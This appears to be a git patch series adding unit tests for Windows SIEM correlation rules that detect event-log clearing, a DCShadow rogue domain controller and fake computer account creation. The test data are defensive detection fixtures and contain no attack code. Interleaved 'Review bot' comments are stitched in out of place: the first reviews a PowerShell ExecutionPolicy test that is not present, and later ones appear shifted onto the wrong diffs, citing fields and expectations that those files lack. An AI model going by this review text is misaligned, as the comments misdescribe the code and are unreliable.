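Review bot: The only case covered is a Sysmon 13 SetValue of the machine-wide `HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy` to `Unrestricted`; the per-user value under the same path in HKCU and other permissive values such as `Bypass` are not exercised, and nothing here shows whether the rule is value-sensitive at all, so a second test setting the value to `Restricted` or `AllSigned` (expected 0 if the rule is meant to fire only on loosening) would document the intended behaviour. The input event carries no user attribution (no `subject.account.*` in the normalized event, and the raw Sysmon data has no `User` field), so the incident is attributed to the process only; a test using a Sysmon 13 event that does carry `User` would show whether the rule passes the account through, which is what an analyst will pivot on. Replace the placeholder `# Тут будет твой тест. …` comment with one describing the scenario, e.g. `# powershell.exe sets machine-wide ExecutionPolicy=Unrestricted (Sysmon 13) -> one incident keyed by host|process`.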
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 10:49:51 +0300 Subject: [PATCH 17/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82,=20=D1=80=D0=B0=D1=81=D1=88?= =?UTF-8?q?=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4?= =?UTF-8?q?=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80?= =?UTF-8?q?=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0?= =?UTF-8?q?=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2?= =?UTF-8?q?=D0=B8=D0=BB=D0=B0(Clearing=5Feventlog)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Clearing_eventlog/tests/test_1.sc | 2 +- .../Clearing_eventlog/tests/test_2.sc | 2 +- .../Clearing_eventlog/tests/test_3.sc | 4 ++++ 3 files changed, 6 insertions(+), 2 deletions(-) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc index 1e564644..2c39f2e0 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_1.sc 
@@ -1,3 +1,3 @@ {"action": "clean", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Eventlog\",\"Guid\":\"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}\"},\"EventID\":\"104\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"104\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-19T23:34:25.8943413Z\"},\"EventRecordID\":\"27736\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"812\",\"ThreadID\":\"3916\"},\"Channel\":\"System\",\"Computer\":\"PC01.example.corp\",\"Security\":{\"UserID\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"}},\"UserData\":{\"LogFileCleared\":{\"xmlns:auto-ns3\":\"3>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"http://manifests.microsoft.com/win/2004/08/windows/eventlog\",\"SubjectUserName\":\"user01\",\"SubjectDomainName\":\"EXAMPLE\",\"Channel\":\"System\",\"BackupPath\":\"\"}}}}", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_System_104_Log_was_cleared", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "104", "normalized": true, "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-01T11:11:22.781Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": 
"2019-03-19T23:34:25.894Z", "type": "raw", "uuid": "836bf47c-840f-416f-9fc5-042f340c47c7"} -expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "importance": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} \ No newline at end of file +expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Clearing_eventlog|pc01.example.corp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} \ No newline at end of file 
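Review bot: The expectation now pins `incident.aggregation.key` to `Clearing_eventlog|pc01.example.corp` with `incident.aggregation.timeout` 7200, i.e. aggregation by host alone: a further clear on pc01 within two hours by a different account, or of a different channel, would fold into this incident because neither the subject nor `object.name` is part of the key. If that is the intended triage granularity, state it in the test, e.g. `# aggregation is per host only: repeated log clears on pc01 within 2h collapse into one incident`; if not, the key needs the log name or the subject as well. The rewritten expect line still ends with `\ No newline at end of file`; add the trailing newline.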
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc
index 9281f60f..96fc5735 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_2.sc
@@ -1,3 +1,3 @@ {"action": "clean", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Eventlog\",\"Guid\":\"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}\"},\"EventID\":\"104\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"104\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-19T23:34:25.8943413Z\"},\"EventRecordID\":\"27736\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"812\",\"ThreadID\":\"3916\"},\"Channel\":\"System\",\"Computer\":\"PC01.example.corp\",\"Security\":{\"UserID\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"}},\"UserData\":{\"LogFileCleared\":{\"xmlns:auto-ns3\":\"3>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"http://manifests.microsoft.com/win/2004/08/windows/eventlog\",\"SubjectUserName\":\"user01\",\"SubjectDomainName\":\"EXAMPLE\",\"Channel\":\"System\",\"BackupPath\":\"Allalalal\"}}}}", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_System_104_Log_was_cleared", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "104", "normalized": true, "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "Allalalal", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-01T11:11:22.781Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": 
"2019-03-19T23:34:25.894Z", "type": "raw", "uuid": "836bf47c-840f-416f-9fc5-042f340c47c7"} -expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "importance": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "Allalalal", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} +expect 1 {"action": "clean", "alert.context": "example\\user01 clean System", "alert.key": "System", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Clearing_eventlog|pc01.example.corp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "log", "object.name": "System", "object.property": "backup path", "object.value": "Allalalal", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} \ No newline at end of file 
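Review bot: The new expect line drops the trailing newline that the old one had (`\ No newline at end of file` appears only on the `+` side); restore it so the file does not churn on the next edit. test_2 differs from test_1 only in `BackupPath`/`object.value` being non-empty, which is a useful case — a clear that was preceded by a backup must still fire — but nothing says so; add `# Clear with a backup path set must still raise the incident` above the expect, and consider replacing the junk value `Allalalal` with a path-shaped string such as `C:\Temp\System.evtx` so the field's meaning is obvious to the next reader.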
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc
new file mode 100644
index 00000000..2b9e7666
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Clearing_eventlog/tests/test_3.sc
@@ -0,0 +1,4 @@ +{"action": "clean", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Eventlog\",\"Guid\":\"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}\"},\"EventID\":\"1102\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"104\",\"Opcode\":\"0\",\"Keywords\":\"0x4020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-19T23:35:07.5242021Z\"},\"EventRecordID\":\"452811\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"812\",\"ThreadID\":\"3916\"},\"Channel\":\"Security\",\"Computer\":\"PC01.example.corp\",\"Security\":\"\"},\"UserData\":{\"LogFileCleared\":{\"xmlns:auto-ns3\":\"3>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"http://manifests.microsoft.com/win/2004/08/windows/eventlog\",\"SubjectUserSid\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\",\"SubjectUserName\":\"user01\",\"SubjectDomainName\":\"EXAMPLE\",\"SubjectLogonId\":\"0x17dad\"}}}}", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_1102_Audit_log_was_cleared", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1102", "normalized": true, "object": "log", "object.name": "Security", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T06:04:59.892Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "97709", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-19T23:35:07.524Z", 
"type": "raw", "uuid": "704cf992-087a-4de2-b497-8a31d3b1390e"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "clean", "alert.context": "example\\user01 clean Security", "alert.key": "Security", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indicator Removal", "correlation_name": "Clearing_eventlog", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Clearing_eventlog|pc01.example.corp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "log", "object.name": "Security", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01"} From 6937ce3663ab63c652367579653eff63ee18e855 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 10:57:07 +0300 Subject: [PATCH 18/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(DCShadow=5FAttack)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../DCShadow_Attack/tests/test_1.sc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
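Review bot: The expected incident omits `subject.account.session_id` (`97709`, i.e. SubjectLogonId 0x17dad) although the normalized 1102 event carries it, whereas the 104 events in test_1/test_2 do not carry one at all; since the logon ID is the pivot for joining the clear to the 4624 that created the session, the rule should pass it through when present and this test should pin it — unless the omission is deliberate, in which case a comment should say so. The expectation also uses the same `incident.aggregation.key` `Clearing_eventlog|pc01.example.corp` as test_1, so clearing System and then Security on the same host within 7200 s yields a single incident; if that is intended, state it in the test. Replace the placeholder `# Тут будет твой тест. …` comment with a description such as `# 1102: Security log cleared by example\user01 (logon 0x17dad) -> one incident`.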
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc
index c71671f8..64bd8bc0 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/DCShadow_Attack/tests/test_1.sc
@@ -1,4 +1,5 @@ {"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4742\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13825\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T03:00:37.5861731Z\"},\"EventRecordID\":\"203057\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"1224\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"ComputerAccountChange\",\"text\":\"-\"},{\"Name\":\"TargetUserName\",\"text\":\"ALICE$\"},{\"Name\":\"TargetDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1120\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x418a6fb\"},{\"Name\":\"PrivilegeList\",\"text\":\"-\"},{\"Name\":\"SamAccountName\",\"text\":\"-\"},{\"Name\":\"DisplayName\",\"text\":\"-\"},{\"Name\":\"UserPrincipalName\",\"text\":\"-\"},{\"Name\":\"HomeDirectory\",\"text\":\"-\"},{\"Name\":\"HomePath\",\"text\":\"-\"},{\"Name\":\"ScriptPath\",\"text\":\"-\"},{\"Name\":\"ProfilePath\",\"text\":\"-\"},{\"Name\":\"UserWorkstations\",\"text\":\"-\"},{\"Name\":\"PasswordLastSet\",\"text\":\"-\"},{\"Name\":\"AccountExpires\",\"text\":\"-\"},{\"Name\":\"PrimaryGroupId\",\"text\":\"-\"},{\"Name\":\"AllowedToDelegateTo\",\"text\":\"-\"},{\"Name\":\"OldUacValue\",\"text\":\"-\"},{\"Name\":\"NewUacValue\",\"text\":\"-\"},{\"Name\":\"UserAccountControl\",\"text\":\"-\"},{\"Name\":\"UserParameters\",\"text\":\"-\"},{\"Name\":\"SidHistory\",\"text\":\"-\"},{\"Name\":\"LogonHours\",\"text\":\
"-\"},{\"Name\":\"DnsHostName\",\"text\":\"-\"},{\"Name\":\"ServicePrincipalNames\",\"text\":\"HOST/alice.insecurebank.local RestrictedKrbHost/alice.insecurebank.local HOST/ALICE RestrictedKrbHost/ALICE TERMSRV/alice.insecurebank.local TERMSRV/ALICE WSMAN/alice.insecurebank.local WSMAN/alice GC/alice.insecurebank.local/insecurebank.local E3514235-4B06-11D1-AB04-00C04FC2DCD2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield2": "host/alice.insecurebank.local restrictedkrbhost/alice.insecurebank.local host/alice restrictedkrbhost/alice termsrv/alice.insecurebank.local termsrv/alice wsman/alice.insecurebank.local wsman/alice gc/alice.insecurebank.local/insecurebank.local e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4742_A_computer_account_was_changed", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4742", "normalized": true, "object": "account", "object.account.domain": "insecurebank", "object.account.id": "S-1-5-21-738609754-2819869699-4189121830-1120", "object.account.name": "alice$", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-01T17:17:32.832Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "68724475", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", 
"taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T03:00:37.586Z", "type": "raw", "uuid": "69cc2855-b059-4b81-8290-55bbb8bd5595"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "modify", "alert.context": "e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Rogue Domain Controller", "correlation_name": "DCShadow_Attack", "correlation_type": "incident", "datafield2": "host/alice.insecurebank.local restrictedkrbhost/alice.insecurebank.local host/alice restrictedkrbhost/alice termsrv/alice.insecurebank.local termsrv/alice wsman/alice.insecurebank.local wsman/alice gc/alice.insecurebank.local/insecurebank.local e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "importance": "high", "object": "account", "object.account.domain": "insecurebank", "object.account.id": "S-1-5-21-738609754-2819869699-4189121830-1120", "object.account.name": "alice$", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "68724475"} \ No newline at end of file +expect 1 {"action": "modify", "alert.context": "e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Rogue Domain Controller", "correlation_name": "DCShadow_Attack", "correlation_type": "incident", "datafield2": "host/alice.insecurebank.local restrictedkrbhost/alice.insecurebank.local host/alice restrictedkrbhost/alice termsrv/alice.insecurebank.local termsrv/alice wsman/alice.insecurebank.local wsman/alice 
gc/alice.insecurebank.local/insecurebank.local e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "event_src.category": "Directory service", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.category": "UserCompromising", "incident.severity": "high", "object": "account", "object.account.domain": "insecurebank", "object.account.id": "S-1-5-21-738609754-2819869699-4189121830-1120", "object.account.name": "alice$", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "68724475"} + \ No newline at end of file From 7f683b15b8f20984c07d36eafc88ea5924bbf172 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:02:02 +0300 Subject: [PATCH 19/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Detect=5FFake=5FCompute?= =?UTF-8?q?rAccount)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_Fake_ComputerAccount/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc new file mode 100644 index 00000000..ffb1b069 
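Review bot: The `+expect 1` line still covers only the positive case, and the same SPN write (a `GC/…` entry plus the DRS GUID `E3514235-4B06-11D1-AB04-00C04FC2DCD2/…`) is made legitimately when a real domain controller is promoted, so nothing in this test shows the rule stays quiet for a sanctioned DC. Add a second scenario with a 4742 whose ServicePrincipalNames carry only `HOST/` and `RestrictedKrbHost/` entries and assert `expect 0`, and if the rule has an exclusion for known DCs, a third scenario exercising it. The expanded expectation also pins no `incident.aggregation.key`/`incident.aggregation.timeout`, unlike the sibling expectations in this series (Clearing_eventlog, Detect_Fake_ComputerAccount); if the rule really emits none, aggregating on `event_src.host|object.account.name` is worth considering so repeated replication attempts from one rogue host fold into a single incident. The patch additionally appends a whitespace-only last line without a trailing newline (`+ ` just before `\ No newline at end of file`), which is presumably harmless to the runner but is easy to drop.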
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc
@@ -0,0 +1,4 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4720\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-16T09:31:19.1332724Z\"},\"EventRecordID\":\"769629\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"584\",\"ThreadID\":\"752\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"$\"},{\"Name\":\"TargetDomainName\",\"text\":\"3B\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"01566S-WIN16-IR$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x3e7\"},{\"Name\":\"PrivilegeList\",\"text\":\"-\"},{\"Name\":\"SamAccountName\",\"text\":\"$\"},{\"Name\":\"DisplayName\",\"text\":\"%%1793\"},{\"Name\":\"UserPrincipalName\",\"text\":\"-\"},{\"Name\":\"HomeDirectory\",\"text\":\"%%1793\"},{\"Name\":\"HomePath\",\"text\":\"%%1793\"},{\"Name\":\"ScriptPath\",\"text\":\"%%1793\"},{\"Name\":\"ProfilePath\",\"text\":\"%%1793\"},{\"Name\":\"UserWorkstations\",\"text\":\"%%1793\"},{\"Name\":\"PasswordLastSet\",\"text\":\"%%1794\"},{\"Name\":\"AccountExpires\",\"text\":\"%%1794\"},{\"Name\":\"PrimaryGroupId\",\"text\":\"513\"},{\"Name\":\"AllowedToDelegateTo\",\"text\":\"-\"},{\"Name\":\"OldUacValue\",\"text\":\"0x0\"},{\"Name\":\"NewUacValue\",\"text\":\"0x15\"},{\"Name\":\"UserAccountControl\",\"text\":\"%%2080 %%2082 %%2084\"},{\"Name\":\"UserParameters\",\"text\":\"%%1792\"},{\"Name\":\"SidHistory\",\"text\":\"-\"},{\"Name\":\"LogonHours\",\"text\":\"%%1793\"}]}}}", 
"category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4720_A_user_account_was_created", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4720", "normalized": true, "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "object.account.name": "$", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T20:07:35.899Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-18", "subject.account.name": "01566s-win16-ir$", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-16T09:31:19.133Z", "type": "raw", "uuid": "e6dd0caf-b655-4c03-807d-9f91177f7307"} + +# Тут будет твой тест. 
